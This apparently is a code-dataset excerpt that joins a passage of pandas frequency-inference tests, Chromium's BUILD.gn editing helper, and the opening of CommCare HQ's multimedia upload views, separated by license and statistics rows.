with pytest.raises(ValueError, match='Invalid frequency: '):
frequencies.to_offset(invalid_anchor)
def test_ms_vs_MS():
left = frequencies.get_offset('ms')
right = frequencies.get_offset('MS')
assert left == offsets.Milli()
assert right == offsets.MonthBegin()
def test_rule_aliases():
rule = frequencies.to_offset('10us')
assert rule == offsets.Micro(10)
class TestFrequencyCode(object):
def test_freq_code(self):
assert get_freq('A') == 1000
assert get_freq('3A') == 1000
assert get_freq('-1A') == 1000
assert get_freq('Y') == 1000
assert get_freq('3Y') == 1000
assert get_freq('-1Y') == 1000
assert get_freq('W') == 4000
assert get_freq('W-MON') == 4001
assert get_freq('W-FRI') == 4005
for freqstr, code in compat.iteritems(_period_code_map):
result = get_freq(freqstr)
assert result == code
result = resolution.get_freq_group(freqstr)
assert result == code // 1000 * 1000
result = resolution.get_freq_group(code)
assert result == code // 1000 * 1000
def test_freq_group(self):
assert resolution.get_freq_group('A') == 1000
assert resolution.get_freq_group('3A') == 1000
assert resolution.get_freq_group('-1A') == 1000
assert resolution.get_freq_group('A-JAN') == 1000
assert resolution.get_freq_group('A-MAY') == 1000
assert resolution.get_freq_group('Y') == 1000
assert resolution.get_freq_group('3Y') == 1000
assert resolution.get_freq_group('-1Y') == 1000
assert resolution.get_freq_group('Y-JAN') == 1000
assert resolution.get_freq_group('Y-MAY') == 1000
assert resolution.get_freq_group(offsets.YearEnd()) == 1000
assert resolution.get_freq_group(offsets.YearEnd(month=1)) == 1000
assert resolution.get_freq_group(offsets.YearEnd(month=5)) == 1000
assert resolution.get_freq_group('W') == 4000
assert resolution.get_freq_group('W-MON') == 4000
assert resolution.get_freq_group('W-FRI') == 4000
assert resolution.get_freq_group(offsets.Week()) == 4000
assert resolution.get_freq_group(offsets.Week(weekday=1)) == 4000
assert resolution.get_freq_group(offsets.Week(weekday=5)) == 4000
def test_get_to_timestamp_base(self):
tsb = libfrequencies.get_to_timestamp_base
assert (tsb(get_freq_code('D')[0]) ==
get_freq_code('D')[0])
assert (tsb(get_freq_code('W')[0]) ==
get_freq_code('D')[0])
assert (tsb(get_freq_code('M')[0]) ==
get_freq_code('D')[0])
assert (tsb(get_freq_code('S')[0]) ==
get_freq_code('S')[0])
assert (tsb(get_freq_code('T')[0]) ==
get_freq_code('S')[0])
assert (tsb(get_freq_code('H')[0]) ==
get_freq_code('S')[0])
def test_freq_to_reso(self):
Reso = resolution.Resolution
assert Reso.get_str_from_freq('A') == 'year'
assert Reso.get_str_from_freq('Q') == 'quarter'
assert Reso.get_str_from_freq('M') == 'month'
assert Reso.get_str_from_freq('D') == 'day'
assert Reso.get_str_from_freq('H') == 'hour'
assert Reso.get_str_from_freq('T') == 'minute'
assert Reso.get_str_from_freq('S') == 'second'
assert Reso.get_str_from_freq('L') == 'millisecond'
assert Reso.get_str_from_freq('U') == 'microsecond'
assert Reso.get_str_from_freq('N') == 'nanosecond'
for freq in ['A', 'Q', 'M', 'D', 'H', 'T', 'S', 'L', 'U', 'N']:
# check roundtrip
result = Reso.get_freq(Reso.get_str_from_freq(freq))
assert freq == result
for freq in ['D', 'H', 'T', 'S', 'L', 'U']:
result = Reso.get_freq(Reso.get_str(Reso.get_reso_from_freq(freq)))
assert freq == result
def test_resolution_bumping(self):
# see gh-14378
Reso = resolution.Resolution
assert Reso.get_stride_from_decimal(1.5, 'T') == (90, 'S')
assert Reso.get_stride_from_decimal(62.4, 'T') == (3744, 'S')
assert Reso.get_stride_from_decimal(1.04, 'H') == (3744, 'S')
assert Reso.get_stride_from_decimal(1, 'D') == (1, 'D')
assert (Reso.get_stride_from_decimal(0.342931, 'H') ==
(1234551600, 'U'))
assert Reso.get_stride_from_decimal(1.2345, 'D') == (106660800, 'L')
with pytest.raises(ValueError):
Reso.get_stride_from_decimal(0.5, 'N')
        # too much precision in the input can prevent conversion
with pytest.raises(ValueError):
Reso.get_stride_from_decimal(0.3429324798798269273987982, 'H')
def test_get_freq_code(self):
# frequency str
assert (get_freq_code('A') ==
(get_freq('A'), 1))
assert (get_freq_code('3D') ==
(get_freq('D'), 3))
assert (get_freq_code('-2M') ==
(get_freq('M'), -2))
# tuple
assert (get_freq_code(('D', 1)) ==
(get_freq('D'), 1))
assert (get_freq_code(('A', 3)) ==
(get_freq('A'), 3))
assert (get_freq_code(('M', -2)) ==
(get_freq('M'), -2))
# numeric tuple
assert get_freq_code((1000, 1)) == (1000, 1)
# offsets
assert (get_freq_code(offsets.Day()) ==
(get_freq('D'), 1))
assert (get_freq_code(offsets.Day(3)) ==
(get_freq('D'), 3))
assert (get_freq_code(offsets.Day(-2)) ==
(get_freq('D'), -2))
assert (get_freq_code(offsets.MonthEnd()) ==
(get_freq('M'), 1))
assert (get_freq_code(offsets.MonthEnd(3)) ==
(get_freq('M'), 3))
assert (get_freq_code(offsets.MonthEnd(-2)) ==
(get_freq('M'), -2))
assert (get_freq_code(offsets.Week()) ==
(get_freq('W'), 1))
assert (get_freq_code(offsets.Week(3)) ==
(get_freq('W'), 3))
assert (get_freq_code(offsets.Week(-2)) ==
(get_freq('W'), -2))
# Monday is weekday=0
assert (get_freq_code(offsets.Week(weekday=1)) ==
(get_freq('W-TUE'), 1))
assert (get_freq_code(offsets.Week(3, weekday=0)) ==
(get_freq('W-MON'), 3))
assert (get_freq_code(offsets.Week(-2, weekday=4)) ==
(get_freq('W-FRI'), -2))
def test_frequency_misc(self):
assert (resolution.get_freq_group('T') ==
FreqGroup.FR_MIN)
code, stride = get_freq_code(offsets.Hour())
assert code == FreqGroup.FR_HR
code, stride = get_freq_code((5, 'T'))
assert code == FreqGroup.FR_MIN
assert stride == 5
offset = offsets.Hour()
result = frequencies.to_offset(offset)
assert result == offset
result = frequencies.to_offset((5, 'T'))
expected = offsets.Minute(5)
assert result == expected
with pytest.raises(ValueError, match='Invalid frequency'):
get_freq_code((5, 'baz'))
with pytest.raises(ValueError, match='Invalid frequency'):
frequencies.to_offset('100foo')
with pytest.raises(ValueError, match='Could not evaluate'):
frequencies.to_offset(('', ''))
_dti = DatetimeIndex
class TestFrequencyInference(object):
def test_raise_if_period_index(self):
index = period_range(start="1/1/1990", periods=20, freq="M")
pytest.raises(TypeError, frequencies.infer_freq, index)
def test_raise_if_too_few(self):
index = _dti(['12/31/1998', '1/3/1999'])
pytest.raises(ValueError, frequencies.infer_freq, index)
def test_business_daily(self):
index = _dti(['01/01/1999', '1/4/1999', '1/5/1999'])
assert frequencies.infer_freq(index) == 'B'
def test_business_daily_look_alike(self):
# GH 16624, do not infer 'B' when 'weekend' (2-day gap) in wrong place
index = _dti(['12/31/1998', '1/3/1999', '1/4/1999'])
assert frequencies.infer_freq(index) is None
def test_day(self):
self._check_tick(timedelta(1), 'D')
def test_day_corner(self):
index = _dti(['1/1/2000', '1/2/2000', '1/3/2000'])
assert frequencies.infer_freq(index) == 'D'
def test_non_datetimeindex(self):
dates = to_datetime(['1/1/2000', '1/2/2000', '1/3/2000'])
assert frequencies.infer_freq(dates) == 'D'
def test_hour(self):
self._check_tick(timedelta(hours=1), 'H')
def test_minute(self):
self._check_tick(timedelta(minutes=1), 'T')
def test_second(self):
self._check_tick(timedelta(seconds=1), 'S')
def test_millisecond(self):
self._check_tick(timedelta(microseconds=1000), 'L')
def test_microsecond(self):
self._check_tick(timedelta(microseconds=1), 'U')
def test_nanosecond(self):
self._check_tick(np.timedelta64(1, 'ns'), 'N')
def _check_tick(self, base_delta, code):
b = Timestamp(datetime.now())
for i in range(1, 5):
inc = base_delta * i
index = _dti([b + inc * j for j in range(3)])
if i > 1:
exp_freq = '%d%s' % (i, code)
else:
exp_freq = code
assert frequencies.infer_freq(index) == exp_freq
index = _dti([b + base_delta * 7] + [b + base_delta * j for j in range(
3)])
assert frequencies.infer_freq(index) is None
index = _dti([b + base_delta * j for j in range(3)] + [b + base_delta *
7])
assert frequencies.infer_freq(index) is None
def test_weekly(self):
days = ['MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT', 'SUN']
for day in days:
self._check_generated_range('1/1/2000', 'W-%s' % day)
def test_week_of_month(self):
days = ['MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT', 'SUN']
for day in days:
for i in range(1, 5):
self._check_generated_range('1/1/2000', 'WOM-%d%s' % (i, day))
def test_fifth_week_of_month(self):
# Only supports freq up to WOM-4. See #9425
func = lambda: date_range('2014-01-01', freq='WOM-5MON')
pytest.raises(ValueError, func)
def test_fifth_week_of_month_infer(self):
# Only attempts to infer up to WOM-4. See #9425
index = DatetimeIndex(["2014-03-31", "2014-06-30", "2015-03-30"])
assert frequencies.infer_freq(index) is None
def test_week_of_month_fake(self):
# All of these dates are on same day of week and are 4 or 5 weeks apart
index = DatetimeIndex(["2013-08-27", "2013-10-01", "2013-10-29",
"2013-11-26"])
assert frequencies.infer_freq(index) != 'WOM-4TUE'
def test_monthly(self):
self._check_generated_range('1/1/2000', 'M')
def test_monthly_ambiguous(self):
rng = _dti(['1/31/2000', '2/29/2000', '3/31/2000'])
assert rng.inferred_freq == 'M'
def test_business_monthly(self):
self._check_generated_range('1/1/2000', 'BM')
def test_business_start_monthly(self):
self._check_generated_range('1/1/2000', 'BMS')
def test_quarterly(self):
for month in ['JAN', 'FEB', 'MAR']:
self._check_generated_range('1/1/2000', 'Q-%s' % month)
def test_annual(self):
for month in MONTHS:
self._check_generated_range('1/1/2000', 'A-%s' % month)
def test_business_annual(self):
for month in MONTHS:
self._check_generated_range('1/1/2000', 'BA-%s' % month)
def test_annual_ambiguous(self):
rng = _dti(['1/31/2000', '1/31/2001', '1/31/2002'])
assert rng.inferred_freq == 'A-JAN'
def _check_generated_range(self, start, freq):
freq = freq.upper()
gen = date_range(start, periods=7, freq=freq)
index = _dti(gen.values)
if not freq.startswith('Q-'):
assert frequencies.infer_freq(index) == gen.freqstr
else:
inf_freq = frequencies.infer_freq(index)
is_dec_range = inf_freq == 'Q-DEC' and gen.freqstr in (
'Q', 'Q-DEC', 'Q-SEP', 'Q-JUN', 'Q-MAR')
is_nov_range = inf_freq == 'Q-NOV' and gen.freqstr in (
'Q-NOV', 'Q-AUG', 'Q-MAY', 'Q-FEB')
is_oct_range = inf_freq == 'Q-OCT' and gen.freqstr in (
'Q-OCT', 'Q-JUL', 'Q-APR', 'Q-JAN')
assert is_dec_range or is_nov_range or is_oct_range
gen = date_range(start, periods=5, freq=freq)
index = _dti(gen.values)
if not freq.startswith('Q-'):
assert frequencies.infer_freq(index) == gen.freqstr
else:
inf_freq = frequencies.infer_freq(index)
is_dec_range = inf_freq == 'Q-DEC' and gen.freqstr in (
'Q', 'Q-DEC', 'Q-SEP', 'Q-JUN', 'Q-MAR')
is_nov_range = inf_freq == 'Q-NOV' and gen.freqstr in (
'Q-NOV', 'Q-AUG', 'Q-MAY', 'Q-FEB')
is_oct_range = inf_freq == 'Q-OCT' and gen.freqstr in (
'Q-OCT', 'Q-JUL', 'Q-APR', 'Q-JAN')
assert is_dec_range or is_nov_range or is_oct_range
def test_infer_freq(self):
rng = period_range('1959Q2', '2009Q3', freq='Q')
rng = Index(rng.to_timestamp('D', how='e').astype(object))
assert rng.inferred_freq == 'Q-DEC'
rng = period_range('1959Q2', '2009Q3', freq='Q-NOV')
rng = Index(rng.to_timestamp('D', how='e').astype(object))
assert rng.inferred_freq == 'Q-NOV'
rng = period_range('1959Q2', '2009Q3', freq='Q-OCT')
rng = Index(rng.to_timestamp('D', how='e').astype(object))
assert rng.inferred_freq == 'Q-OCT'
def test_infer_freq_tz(self):
freqs = {'AS-JAN':
['2009-01-01', '2010-01-01', '2011-01-01', '2012-01-01'],
'Q-OCT':
['2009-01-31', '2009-04-30', '2009-07-31', '2009-10-31'],
'M': ['2010-11-30', '2010-12-31', '2011-01-31', '2011-02-28'],
'W-SAT':
['2010-12-25', '2011-01-01', '2011-01-08', '2011-01-15'],
'D': ['2011-01-01', '2011-01-02', '2011-01-03', '2011-01-04'],
'H': ['2011-12-31 22:00', '2011-12-31 23:00',
'2012-01-01 00:00', '2012-01-01 01:00']}
# GH 7310
for tz in [None, 'Australia/Sydney', 'Asia/Tokyo', 'Europe/Paris',
'US/Pacific', 'US/Eastern']:
for expected, dates in compat.iteritems(freqs):
idx = DatetimeIndex(dates, tz=tz)
assert idx.inferred_freq == expected
def test_infer_freq_tz_transition(self):
# Tests for #8772
date_pairs = [['2013-11-02', '2013-11-5'], # Fall DST
['2014-03-08', '2014-03-11'], # Spring DST
['2014-01-01', '2014-01-03']] # Regular Time
freqs = ['3H', '10T', '3601S', '3600001L', '3600000001U',
'3600000000001N']
for tz in [None, 'Australia/Sydney', 'Asia/Tokyo', 'Europe/Paris',
'US/Pacific', 'US/Eastern']:
for date_pair in date_pairs:
for freq in freqs:
idx = date_range(date_pair[0], date_pair[
1], freq=freq, tz=tz)
assert idx.inferred_freq == freq
index = date_range("2013-11-03", periods=5,
freq="3H").tz_localize("America/Chicago")
assert index.inferred_freq is None
def test_infer_freq_businesshour(self):
# GH 7905
idx = DatetimeIndex(
['2014-07-01 09:00', '2014-07-01 10:00', '2014-07-01 11:00',
'2014-07-01 12:00', '2014-07-01 13:00', '2014-07-01 14:00'])
# hourly freq in a day must result in 'H'
assert idx.inferred_freq == 'H'
idx = DatetimeIndex(
['2014-07-01 09:00', '2014-07-01 10:00', '2014-07-01 11:00',
'2014-07-01 12:00', '2014-07-01 13:00', '2014-07-01 14:00',
'2014-07-01 15:00', '2014-07-01 16:00', '2014-07-02 09:00',
'2014-07-02 10:00', '2014-07-02 11:00'])
assert idx.inferred_freq == 'BH'
idx = DatetimeIndex(
['2014-07-04 09:00', '2014-07-04 10:00', '2014-07-04 11:00',
'2014-07-04 12:00', '2014-07-04 13:00', '2014-07-04 14:00',
'2014-07-04 15:00', '2014-07-04 16:00', '2014-07-07 09:00',
'2014-07-07 10:00', '2014-07-07 11:00'])
assert idx.inferred_freq == 'BH'
idx = DatetimeIndex(
['2014-07-04 09:00', '2014-07-04 10:00', '2014-07-04 11:00',
'2014-07-04 12:00', '2014-07-04 13:00', '2014-07-04 14:00',
'2014-07-04 15:00', '2014-07-04 16:00', '2014-07-07 09:00',
'2014-07-07 10:00', '2014-07-07 11:00', '2014-07-07 12:00',
'2014-07-07 13:00', '2014-07-07 14:00', '2014-07-07 15:00',
'2014-07-07 16:00', '2014-07-08 09:00', '2014-07-08 10:00',
'2014-07-08 11:00', '2014-07-08 12:00', '2014-07-08 13:00',
'2014-07-08 14:00', '2014-07-08 15:00', '2014-07-08 16:00'])
assert idx.inferred_freq == 'BH'
def test_not_monotonic(self):
rng = _dti(['1/31/2000', '1/31/2001', '1/31/2002'])
rng = rng[::-1]
assert rng.inferred_freq == '-1A-JAN'
def test_non_datetimeindex2(self):
rng = _dti(['1/31/2000', '1/31/2001', '1/31/2002'])
vals = rng.to_pydatetime()
result = frequencies.infer_freq(vals)
assert result == rng.inferred_freq
def test_invalid_index_types(self):
# test all index types
for i in [tm.makeIntIndex(10), tm.makeFloatIndex(10),
tm.makePeriodIndex(10)]:
pytest.raises(TypeError, lambda: frequencies.infer_freq(i))
# GH 10822
# odd error message on conversions to datetime for unicode
if not is_platform_windows():
for i in [tm.makeStringIndex(10), tm.makeUnicodeIndex(10)]:
pytest.raises(ValueError, lambda: frequencies.infer_freq(i))
def test_string_datetimelike_compat(self):
# GH 6463
expected = frequencies.infer_freq(['2004-01', '2004-02', '2004-03',
'2004-04'])
result = frequencies.infer_freq(Index(['2004-01', '2004-02', '2004-03',
'2004-04']))
assert result == expected
def test_series(self):
# GH6407
# inferring series
# invalid type of Series
for s in [Series(np.arange(10)), Series(np.arange(10.))]:
pytest.raises(TypeError, lambda: frequencies.infer_freq(s))
# a non-convertible string
pytest.raises(ValueError, lambda: frequencies.infer_freq(
Series(['foo', 'bar'])))
# cannot infer on PeriodIndex
for freq in [None, 'L']:
s = Series(period_range('2013', periods=10, freq=freq))
pytest.raises(TypeError, lambda: frequencies.infer_freq(s))
# DateTimeIndex
for freq in ['M', 'L', 'S']:
s = Series(date_range('20130101', periods=10, freq=freq))
inferred = frequencies.infer_freq(s)
assert inferred == freq
s = Series(date_range('20130101', '20130110'))
inferred = frequencies.infer_freq(s)
assert inferred == 'D'
def test_legacy_offset_warnings(self):
freqs = ['WEEKDAY', 'EOM', 'W@MON', 'W@TUE', 'W@WED', 'W@THU',
'W@FRI', 'W@SAT', 'W@SUN', 'Q@JAN', 'Q@FEB', 'Q@MAR',
'A@JAN', 'A@FEB', 'A@MAR', 'A@APR', 'A@MAY', 'A@JUN',
'A@JUL', 'A@AUG', 'A@SEP', 'A@OCT', 'A@NOV', 'A@DEC',
'Y@JAN', 'WOM@1MON', 'WOM@2MON', 'WOM@3MON',
'WOM@4MON', 'WOM@1TUE', 'WOM@2TUE', 'WOM@3TUE',
'WOM@4TUE', 'WOM@1WED', 'WOM@2WED', 'WOM@3WED',
'WOM@4WED', 'WOM@1THU', 'WOM@2THU', 'WOM@3THU',
'WOM@4THU', 'WOM@1FRI', 'WOM@2FRI', 'WOM@3FRI',
'WOM@4FRI']
msg = INVALID_FREQ_ERR_MSG
for freq in freqs:
with pytest.raises(ValueError, match=msg):
frequencies.get_offset(freq)
with pytest.raises(ValueError, match=msg):
date_range('2011-01-01', periods=5, freq=freq)
| bsd-3-clause | 8,207,404,789,403,593,000 | 36.432535 | 79 | 0.55289 | false |
chromium/chromium | tools/android/modularization/convenience/build_gn_editor.py | 6 | 10119 | # Lint as: python3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
r'''Helper code to handle editing BUILD.gn files.'''
from __future__ import annotations
import difflib
import pathlib
import re
import subprocess
from typing import List, Optional, Tuple
def _find_block(source: str, start: int, open_delim: str,
close_delim: str) -> Tuple[int, int]:
open_delim_pos = source[start:].find(open_delim)
if open_delim_pos < 0:
return (-1, -1)
baseline = start + open_delim_pos
delim_count = 1
for i, char in enumerate(source[baseline + 1:]):
if char == open_delim:
delim_count += 1
continue
if char == close_delim:
delim_count -= 1
if delim_count == 0:
return (baseline, baseline + i + 1)
return (baseline, -1)
def _find_line_end(source: str, start: int) -> int:
pos = source[start:].find('\n')
if pos < 0:
return -1
return start + pos
class BuildFileUpdateError(Exception):
"""Represents an error updating the build file."""
def __init__(self, message: str):
super().__init__()
self._message = message
def __str__(self):
return self._message
class VariableContentList(object):
"""Contains the elements of a list assigned to a variable in a gn target.
Example:
target_type("target_name") {
foo = [
"a",
"b",
"c",
]
}
This class represents the elements "a", "b", "c" for foo.
"""
def __init__(self):
self._elements = []
def parse_from(self, content: str) -> bool:
"""Parses list elements from content and returns True on success.
The expected list format must be a valid gn list. i.e.
1. []
2. [ "foo" ]
3. [
"foo",
"bar",
...
]
"""
start = content.find('[')
if start < 0:
return False
end = start + content[start:].find(']')
if end <= start:
return False
bracketless_content = content[start + 1:end].strip()
if not bracketless_content:
return True
whitespace = re.compile(r'^\s+', re.MULTILINE)
comma = re.compile(r',$', re.MULTILINE)
self._elements = list(
dict.fromkeys(
re.sub(comma, '', re.sub(whitespace, '',
bracketless_content)).split('\n')))
return True
def get_elements(self) -> List[str]:
return self._elements
def add_elements(self, elements: List[str]) -> None:
"""Appends unique elements to the existing list."""
if not self._elements:
self._elements = list(dict.fromkeys(elements))
return
all_elements = list(self._elements)
all_elements.extend(elements)
self._elements = list(dict.fromkeys(all_elements))
def add_list(self, other: VariableContentList) -> None:
"""Appends unique elements to the existing list."""
self.add_elements(other.get_elements())
def serialize(self) -> str:
if not self._elements:
return '[]\n'
return '[\n' + ',\n'.join(self._elements) + ',\n]'
class TargetVariable:
"""Contains the name of a variable and its contents in a gn target.
Example:
target_type("target_name") {
variable_name = variable_content
}
This class represents the variable_name and variable_content.
"""
def __init__(self, name: str, content: str):
self._name = name
self._content = content
def get_name(self) -> str:
return self._name
def get_content(self) -> str:
return self._content
def get_content_as_list(self) -> Optional[VariableContentList]:
"""Returns the variable's content if it can be represented as a list."""
content_list = VariableContentList()
if content_list.parse_from(self._content):
return content_list
return None
def is_list(self) -> bool:
"""Returns whether the variable's content is represented as a list."""
return self.get_content_as_list() is not None
def set_content_from_list(self, content_list: VariableContentList) -> None:
self._content = content_list.serialize()
def set_content(self, content: str) -> None:
self._content = content
def serialize(self) -> str:
return f'\n{self._name} = {self._content}\n'
class BuildTarget:
"""Contains the target name, type and content of a gn target.
Example:
target_type("target_name") {
<content>
}
This class represents target_type, target_name and arbitrary content.
Specific variables are accessible via this class by name although only the
basic 'foo = "bar"' and
'foo = [
"bar",
"baz",
]'
formats are supported, not more complex things like += or conditionals.
"""
def __init__(self, target_type: str, target_name: str, content: str):
self._target_type = target_type
self._target_name = target_name
self._content = content
def get_name(self) -> str:
return self._target_name
def get_type(self) -> str:
return self._target_type
def get_variable(self, variable_name: str) -> Optional[TargetVariable]:
pattern = re.compile(fr'^\s*{variable_name} = ', re.MULTILINE)
match = pattern.search(self._content)
if not match:
return None
start = match.end() - 1
end = start
if self._content[match.end()] == '[':
start, end = _find_block(self._content, start, '[', ']')
else:
end = _find_line_end(self._content, start)
if end <= start:
return None
return TargetVariable(variable_name, self._content[start:end + 1])
def add_variable(self, variable: TargetVariable) -> None:
"""Adds the variable to the end of the content.
Warning: this does not check for prior existence."""
self._content += variable.serialize()
def replace_variable(self, variable: TargetVariable) -> None:
"""Replaces an existing variable and returns True on success."""
pattern = re.compile(fr'^\s*{variable.get_name()} =', re.MULTILINE)
match = pattern.search(self._content)
if not match:
raise BuildFileUpdateError(
f'{self._target_type}("{self._target_name}") variable '
f'{variable.get_name()} not found. Unable to replace.')
start = match.end()
if variable.is_list():
start, end = _find_block(self._content, start, '[', ']')
else:
end = _find_line_end(self._content, start)
if end <= match.start():
raise BuildFileUpdateError(
f'{self._target_type}("{self._target_name}") variable '
f'{variable.get_name()} invalid. Unable to replace.')
self._content = (self._content[:match.start()] + variable.serialize() +
self._content[end + 1:])
def serialize(self) -> str:
return (f'\n{self._target_type}("{self._target_name}") {{\n' +
f'{self._content}\n}}\n')
class BuildFile:
"""Represents the contents of a BUILD.gn file.
This supports modifying or adding targets to the file at a basic level.
"""
def __init__(self, build_gn_path: pathlib.Path):
self._path = build_gn_path
with open(self._path, 'r') as build_gn_file:
self._content = build_gn_file.read()
def get_target_names_of_type(self, target_type: str) -> List[str]:
"""Lists all targets in the build file of target_type."""
pattern = re.compile(fr'^\s*{target_type}\(\"(\w+)\"\)', re.MULTILINE)
return pattern.findall(self._content)
def get_target(self, target_type: str,
target_name: str) -> Optional[BuildTarget]:
pattern = re.compile(fr'^\s*{target_type}\(\"{target_name}\"\)',
re.MULTILINE)
match = pattern.search(self._content)
if not match:
return None
start, end = _find_block(self._content, match.end(), '{', '}')
if end <= start:
return None
return BuildTarget(target_type, target_name, self._content[start + 1:end])
def get_path(self) -> pathlib.Path:
return self._path
def get_content(self) -> str:
return self._content
def get_diff(self) -> str:
with open(self._path, 'r') as build_gn_file:
disk_content = build_gn_file.read()
return ''.join(
difflib.unified_diff(disk_content.splitlines(keepends=True),
self._content.splitlines(keepends=True),
fromfile=f'{self._path}',
tofile=f'{self._path}'))
def add_target(self, target: BuildTarget) -> None:
"""Adds the target to the end of the content.
Warning: this does not check for prior existence."""
self._content += target.serialize()
def replace_target(self, target: BuildTarget) -> None:
"""Replaces an existing target and returns True on success."""
pattern = re.compile(fr'^\s*{target.get_type()}\(\"{target.get_name()}\"\)',
re.MULTILINE)
match = pattern.search(self._content)
if not match:
raise BuildFileUpdateError(
f'{target.get_type()}("{target.get_name()}") not found. '
'Unable to replace.')
start, end = _find_block(self._content, match.end(), '{', '}')
if end <= start:
raise BuildFileUpdateError(
f'{target.get_type()}("{target.get_name()}") invalid. '
'Unable to replace.')
self._content = (self._content[:match.start()] + target.serialize() +
self._content[end + 1:])
def format_content(self) -> None:
process = subprocess.Popen(['gn', 'format', '--stdin'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout_data, stderr_data = process.communicate(input=self._content.encode())
if process.returncode:
raise BuildFileUpdateError(
'Formatting failed. There was likely an error in the changes '
'(this program cannot handle complex BUILD.gn files).\n'
f'stderr: {stderr_data.decode()}')
self._content = stdout_data.decode()
def write_content_to_file(self) -> None:
with open(self._path, 'w+') as build_gn_file:
build_gn_file.write(self._content)
| bsd-3-clause | 719,191,919,956,314,500 | 29.20597 | 80 | 0.612709 | false |
qedsoftware/commcare-hq | corehq/apps/hqmedia/views.py | 1 | 22884 | from StringIO import StringIO
from mimetypes import guess_all_extensions, guess_type
import uuid
import zipfile
import logging
import os
from django.contrib.auth.decorators import login_required
import json
import itertools
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import View, TemplateView
from couchdbkit.exceptions import ResourceNotFound
from django.http import HttpResponse, Http404, HttpResponseServerError, HttpResponseBadRequest
from django.shortcuts import render
import shutil
from corehq import privileges
from corehq.util.files import file_extention_from_filename
from soil import DownloadBase
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.decorators import safe_download
from corehq.apps.app_manager.view_helpers import ApplicationViewMixin
from corehq.apps.hqmedia.cache import BulkMultimediaStatusCache, BulkMultimediaStatusCacheNfs
from corehq.apps.hqmedia.controller import (
MultimediaBulkUploadController,
MultimediaImageUploadController,
MultimediaAudioUploadController,
MultimediaVideoUploadController
)
from corehq.apps.hqmedia.decorators import login_with_permission_from_post
from corehq.apps.hqmedia.models import CommCareImage, CommCareAudio, CommCareMultimedia, MULTIMEDIA_PREFIX, CommCareVideo
from corehq.apps.hqmedia.tasks import process_bulk_upload_zip, build_application_zip
from corehq.apps.users.decorators import require_permission
from corehq.apps.users.models import Permissions
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.django.cached_object import CachedObject
from soil.util import expose_cached_download
from django.utils.translation import ugettext as _
from django_prbac.decorators import requires_privilege_raise404
class BaseMultimediaView(ApplicationViewMixin, View):
@method_decorator(require_permission(Permissions.edit_apps, login_decorator=login_with_permission_from_post()))
def dispatch(self, request, *args, **kwargs):
return super(BaseMultimediaView, self).dispatch(request, *args, **kwargs)
class BaseMultimediaTemplateView(BaseMultimediaView, TemplateView):
"""
The base view for all the multimedia templates.
"""
@property
def page_context(self):
return {}
def get_context_data(self, **kwargs):
context = {
"domain": self.domain,
"app": self.app,
}
context.update(self.page_context)
return context
def render_to_response(self, context, **response_kwargs):
return render(self.request, self.template_name, context)
class BaseMultimediaUploaderView(BaseMultimediaTemplateView):
@property
def page_context(self):
return {
'uploaders': self.upload_controllers,
"sessionid": self.request.COOKIES.get('sessionid'),
}
@property
def upload_controllers(self):
"""
Return a list of Upload Controllers
"""
raise NotImplementedError("You must specify a list of upload controllers")
class MultimediaReferencesView(BaseMultimediaUploaderView):
name = "hqmedia_references"
template_name = "hqmedia/references.html"
@property
def page_context(self):
context = super(MultimediaReferencesView, self).page_context
if self.app is None:
raise Http404(self)
context.update({
"references": self.app.get_references(),
"object_map": self.app.get_object_map(),
"totals": self.app.get_reference_totals(),
"sessionid": self.request.COOKIES.get('sessionid'),
})
return context
@property
def upload_controllers(self):
return [
MultimediaImageUploadController("hqimage", reverse(ProcessImageFileUploadView.name,
args=[self.domain, self.app_id])),
MultimediaAudioUploadController("hqaudio", reverse(ProcessAudioFileUploadView.name,
args=[self.domain, self.app_id])),
MultimediaVideoUploadController("hqvideo", reverse(ProcessVideoFileUploadView.name,
args=[self.domain, self.app_id])),
]
class BulkUploadMultimediaView(BaseMultimediaUploaderView):
name = "hqmedia_bulk_upload"
template_name = "hqmedia/bulk_upload.html"
@property
def upload_controllers(self):
return [MultimediaBulkUploadController("hqmedia_bulk", reverse(ProcessBulkUploadView.name,
args=[self.domain, self.app_id]))]
class BadMediaFileException(Exception):
pass
class BaseProcessUploadedView(BaseMultimediaView):
@property
def username(self):
return self.request.couch_user.username if self.request.couch_user else None
@property
def share_media(self):
return self.request.POST.get('shared') == 't'
@property
def license_used(self):
return self.request.POST.get('license', '')
@property
def author(self):
return self.request.POST.get('author', '')
@property
def attribution_notes(self):
return self.request.POST.get('attribution-notes', '')
@property
@memoized
def uploaded_file(self):
return self.request.FILES.get('Filedata')
@property
@memoized
def mime_type(self):
try:
data = self.uploaded_file.file.read()
return CommCareMultimedia.get_mime_type(data, filename=self.uploaded_file.name)
except Exception as e:
raise BadMediaFileException("There was an error fetching the MIME type of your file. Error: %s" % e)
@method_decorator(require_permission(Permissions.edit_apps, login_decorator=login_with_permission_from_post()))
# YUI js uploader library doesn't support csrf
@csrf_exempt
def dispatch(self, request, *args, **kwargs):
return super(BaseMultimediaView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return HttpResponseBadRequest("You may only post to this URL.")
def post(self, request, *args, **kwargs):
self.errors = []
response = {}
try:
self.validate_file()
response.update(self.process_upload())
except BadMediaFileException as e:
self.errors.append(e.message)
response.update({
'errors': self.errors,
})
return HttpResponse(json.dumps(response))
def validate_file(self, replace_diff_ext=False):
raise NotImplementedError("You must validate your uploaded file!")
def process_upload(self):
raise NotImplementedError("You definitely need to implement this guy.")
class ProcessBulkUploadView(BaseProcessUploadedView):
name = "hqmedia_uploader_bulk"
@property
@memoized
def uploaded_zip(self):
try:
self.uploaded_file.file.seek(0)
return zipfile.ZipFile(self.uploaded_file)
except Exception as e:
raise BadMediaFileException("There was an issue processing the zip file you provided. Error: %s" % e)
def validate_file(self, replace_diff_ext=False):
        if self.mime_type not in self.valid_mime_types():
raise BadMediaFileException("Your zip file doesn't have a valid mimetype.")
if not self.uploaded_zip:
raise BadMediaFileException("There is no ZIP file.")
if self.uploaded_zip.testzip():
raise BadMediaFileException("The ZIP file provided was bad.")
